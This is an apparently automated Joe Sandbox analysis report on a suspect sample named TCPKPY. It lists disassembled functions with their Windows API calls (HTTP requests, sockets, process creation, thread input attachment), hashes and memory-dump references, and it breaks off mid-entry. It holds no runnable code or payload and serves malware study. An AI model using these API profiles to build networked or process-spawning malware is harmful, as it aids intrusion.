                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 313823418-1403004172
                                                                                                                • Opcode ID: f75f1b601a2a82d05e39ad4d9666d52b9b48fc29021f4063342b1fe4625afc29
                                                                                                                • Instruction ID: c6cc98c5ee992e84f765a9be49bf3fc1e4c4d2ccf8d64030c2b915adc22a83df
                                                                                                                • Opcode Fuzzy Hash: f75f1b601a2a82d05e39ad4d9666d52b9b48fc29021f4063342b1fe4625afc29
                                                                                                                • Instruction Fuzzy Hash: 0421A1B9A11208ABDF01AF64DC85EFEB769EF45300F204115F551E31D2EB7459299F20
                                                                                                                Function 0023C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 0023C8D9
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 0023C8EE
                                                                                                                • _wcscmp.LIBCMT ref: 0023C900
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0023C97B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                • Opcode ID: c02d88485f276384c072dd4260d6c7a573a70749117ca1c3e9d13cf9f601a50f
                                                                                                                • Instruction ID: e5fa2f5ed6d58abfd5540069fe15bcadb4b5a26f0a4d5864683b10de4f20f4d3
                                                                                                                • Opcode Fuzzy Hash: c02d88485f276384c072dd4260d6c7a573a70749117ca1c3e9d13cf9f601a50f
                                                                                                                • Instruction Fuzzy Hash: 3E11A7BA678317B9F6042A20BC0AEB667AC9B17768F310122F900B50D2FFA169364654
                                                                                                                Function 0025B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0025B777
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0025B7A4
                                                                                                                • CoUninitialize.OLE32 ref: 0025B7AE
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0025B8AE
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0025B9DB
                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0025BA0F
                                                                                                                • CoGetObject.OLE32(?,00000000,0028D91C,?), ref: 0025BA32
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0025BA45
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0025BAC5
                                                                                                                • VariantClear.OLEAUT32(0028D91C), ref: 0025BAD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2395222682-0
                                                                                                                • Opcode ID: edb9c341d18129c29d9ea38313cd9ab131fde33f2bef98bff250c4cbb8994d25
                                                                                                                • Instruction ID: f82e9445f4582bbcba0d7b2cef82f2dfc867c6a4942ad91900d06e22f198dc88
                                                                                                                • Opcode Fuzzy Hash: edb9c341d18129c29d9ea38313cd9ab131fde33f2bef98bff250c4cbb8994d25
                                                                                                                • Instruction Fuzzy Hash: C4C154B1628301AFC700EF68C88492BB7E9FF89315F04491DF98A9B251DB70ED19CB52
                                                                                                                Function 0024B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0024B137
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafeVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725837607-0
                                                                                                                • Opcode ID: 255d2b440a7e822bcd4b971313535877d76af0dee7d24bfdbc8832b2ce94aef5
                                                                                                                • Instruction ID: db0e22bb8cc22e975638b970c5bab67f891c83dfac481982e103192c70c16647
                                                                                                                • Opcode Fuzzy Hash: 255d2b440a7e822bcd4b971313535877d76af0dee7d24bfdbc8832b2ce94aef5
                                                                                                                • Instruction Fuzzy Hash: C7C18F75A1121ADFDB09CF98D485BAEBBB4FF08315F20406AE616E7281C774E951CB90
                                                                                                                Function 00244A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00244A7D
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244A91
                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00244A98
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00243AD7,?,00000001), ref: 00244AA7
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00244AB9
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00243AD7,?,00000001), ref: 00244AD2
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00243AD7,?,00000001), ref: 00244AE4
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244B29
                                                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244B3E
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244B49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156557900-0
                                                                                                                • Opcode ID: f2a303195ea5260fd9313f1c52d85fdb68d3be568266602782e0dcd6d6eec5d2
                                                                                                                • Instruction ID: 839167e910e4b2e2a9ff68f5700f3d7e95289189779ca1c7e337811b5a45f3d7
                                                                                                                • Opcode Fuzzy Hash: f2a303195ea5260fd9313f1c52d85fdb68d3be568266602782e0dcd6d6eec5d2
                                                                                                                • Instruction Fuzzy Hash: 9931BB75A20215ABDB29EF14FC8CFAAB7AEEF60325F108405F904C7190D3B4EE448B60
                                                                                                                Function 0027EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?), ref: 0027EC32
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0027EC49
                                                                                                                • GetWindowDC.USER32(?), ref: 0027EC55
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0027EC64
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0027EC76
                                                                                                                • GetSysColor.USER32(00000005), ref: 0027EC94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 272304278-0
                                                                                                                • Opcode ID: d14a8ba93d3770a54acfb17c9e03d39a237db173546973a3e71886441684f6a3
                                                                                                                • Instruction ID: 76f3e5552386038c9c09b797e75aab8408972dfe5d85be3c2d2946c78a2ec9da
                                                                                                                • Opcode Fuzzy Hash: d14a8ba93d3770a54acfb17c9e03d39a237db173546973a3e71886441684f6a3
                                                                                                                • Instruction Fuzzy Hash: A3216A39511205AFDB22AF60FC4DBE93BB5EB08321F518265FA2AA90E1DB310954DF21
                                                                                                                Function 0023D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnumChildWindows.USER32(?,0023DD46), ref: 0023DC86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumWindows
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                • Opcode ID: 2851065ae34d9941949ac27587ebb2099d72b3661afff3fa77fb6814f52f439f
                                                                                                                • Instruction ID: c698ace3c0259a9343265652312770fe1489f11de72ee5c1b4550f90e473c0fb
                                                                                                                • Opcode Fuzzy Hash: 2851065ae34d9941949ac27587ebb2099d72b3661afff3fa77fb6814f52f439f
                                                                                                                • Instruction Fuzzy Hash: 4591E6B0A30606EACB08DF60D481BEDF7B5BF14344F548526D85AA7191CF7069BACFA0
                                                                                                                Function 0021C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 0021C2D2
                                                                                                                  • Part of subcall function 0021C697: GetClientRect.USER32(?,?), ref: 0021C6C0
                                                                                                                  • Part of subcall function 0021C697: GetWindowRect.USER32(?,?), ref: 0021C701
                                                                                                                  • Part of subcall function 0021C697: ScreenToClient.USER32(?,?), ref: 0021C729
                                                                                                                • GetDC.USER32 ref: 0027E006
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0027E019
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0027E027
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0027E03C
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0027E044
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0027E0CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: a71a9a6c442c4980e9b4da65084b7bf68a5c1ad9f16eaf818b1761d47f73afd4
                                                                                                                • Instruction ID: 1381888932cbca5267e55b292b98dbfee1df5f99b2d741a07f8383e9c5a0fc79
                                                                                                                • Opcode Fuzzy Hash: a71a9a6c442c4980e9b4da65084b7bf68a5c1ad9f16eaf818b1761d47f73afd4
                                                                                                                • Instruction Fuzzy Hash: AA71053542020ADFCF218F64CC85AEA7BB5FF59310F2482A5ED596A1A6C7718CB0DF61
                                                                                                                Function 0026EAA6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                  • Part of subcall function 0021B736: GetCursorPos.USER32(000000FF), ref: 0021B749
                                                                                                                  • Part of subcall function 0021B736: ScreenToClient.USER32(00000000,000000FF), ref: 0021B766
                                                                                                                  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000001), ref: 0021B78B
                                                                                                                  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000002), ref: 0021B799
                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0026EB0E
                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 0026EB14
                                                                                                                • ReleaseCapture.USER32 ref: 0026EB1A
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0026EBC2
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0026EBD5
                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0026ECAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                • API String ID: 1924731296-2107944366
                                                                                                                • Opcode ID: 31a704f28a8caac71e061225d258c65d6f79e0885934689262b341c554f7c4bc
                                                                                                                • Instruction ID: 27b7ae286f6adf10997d6a53481d9618f6a79a2c23adf28b4eadb008663ff753
                                                                                                                • Opcode Fuzzy Hash: 31a704f28a8caac71e061225d258c65d6f79e0885934689262b341c554f7c4bc
                                                                                                                • Instruction Fuzzy Hash: 3351AD75224304AFE700EF24DC9AFAA3BE5FB88700F500A19F541972E2D7709964CF52
                                                                                                                Function 00254C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00254C5E
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00254C8A
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00254CCC
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00254CE1
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00254CEE
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00254D1E
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00254D65
                                                                                                                  • Part of subcall function 002556A9: GetLastError.KERNEL32(?,?,00254A2B,00000000,00000000,00000001), ref: 002556BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1241431887-3916222277
                                                                                                                • Opcode ID: bd8a5ebeec3189c0eabee39c5708bde89aba52f84f095e768195e0c31bcbb1ed
                                                                                                                • Instruction ID: 11fa82ead7d756874e5d95a085195499c2a1a5ed73f406c1db72198a1e92d687
                                                                                                                • Opcode Fuzzy Hash: bd8a5ebeec3189c0eabee39c5708bde89aba52f84f095e768195e0c31bcbb1ed
                                                                                                                • Instruction Fuzzy Hash: 3141A3B5512219BFEB11AF50DC89FFBB7ACEF08319F004116FE019A191D7B09D988BA4
                                                                                                                Function 0025BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0029DBF0), ref: 0025BBA1
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0029DBF0), ref: 0025BBD5
                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0025BD33
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0025BD5D
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,0029DBF0), ref: 0025BEAD
                                                                                                                • ProgIDFromCLSID.OLE32(?,?,?,0029DBF0), ref: 0025BEF7
                                                                                                                • CoTaskMemFree.OLE32(?,?,?,0029DBF0), ref: 0025BF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                • String ID:
                                                                                                                • API String ID: 793797124-0
                                                                                                                • Opcode ID: bfabad0f6630274cfa2ff211172b76e69e979aebc0de1b04e9429b83fc0b1e25
                                                                                                                • Instruction ID: bbe58cf79cb708b2297fb664482d17dfca55b4e080824483e9435e141bce78ba
                                                                                                                • Opcode Fuzzy Hash: bfabad0f6630274cfa2ff211172b76e69e979aebc0de1b04e9429b83fc0b1e25
                                                                                                                • Instruction Fuzzy Hash: A7F15A75A10209EFCB05DFA4C888EAEB7B9FF88315F108059F905AB250DB71AE55CF94
                                                                                                                Function 002623C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 002623E6
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00262579
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026259D
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002625DD
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002625FF
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00262760
                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00262792
                                                                                                                • CloseHandle.KERNEL32(?), ref: 002627C1
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00262838
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4090791747-0
                                                                                                                • Opcode ID: 0aad227ad300ea298d5fc7422c143d41df3b30e1ecd955fbc7e9e1f357be6ddf
                                                                                                                • Instruction ID: 698fd52d7ee14043923ab3fa8f1006fc8be1f9fff98a00ba4fc91020b7320794
                                                                                                                • Opcode Fuzzy Hash: 0aad227ad300ea298d5fc7422c143d41df3b30e1ecd955fbc7e9e1f357be6ddf
                                                                                                                • Instruction Fuzzy Hash: 75D1E035624701DFC724EF24D891A6ABBE5AF84314F14845DF8899B2E2DB30ECA5CF52
                                                                                                                Function 00259A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • select.WSOCK32 ref: 00259B38
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259B45
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00259B6F
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00259B90
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259B9F
                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00259C51
                                                                                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0029DBF0), ref: 00259C0C
                                                                                                                  • Part of subcall function 0023E0F5: _strlen.LIBCMT ref: 0023E0FF
                                                                                                                  • Part of subcall function 0023E0F5: _memmove.LIBCMT ref: 0023E121
                                                                                                                • _strlen.LIBCMT ref: 00259CA7
                                                                                                                • _memmove.LIBCMT ref: 00259D10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3637404534-0
                                                                                                                • Opcode ID: 39183bdee57e70b201468879791e22c76f1648ccf46eb67f88095675884558ec
                                                                                                                • Instruction ID: a4dc8e42d56f3f997b0cedf48652d838e0e42bcbd6cbcebfe8e281a5ee86666d
                                                                                                                • Opcode Fuzzy Hash: 39183bdee57e70b201468879791e22c76f1648ccf46eb67f88095675884558ec
                                                                                                                • Instruction Fuzzy Hash: 6681DD71524300ABD710EF24DC45E6BB7F8EB88714F104A1DF9559B2D2DB30D968CBA2
                                                                                                                Function 0026B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0026B204
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
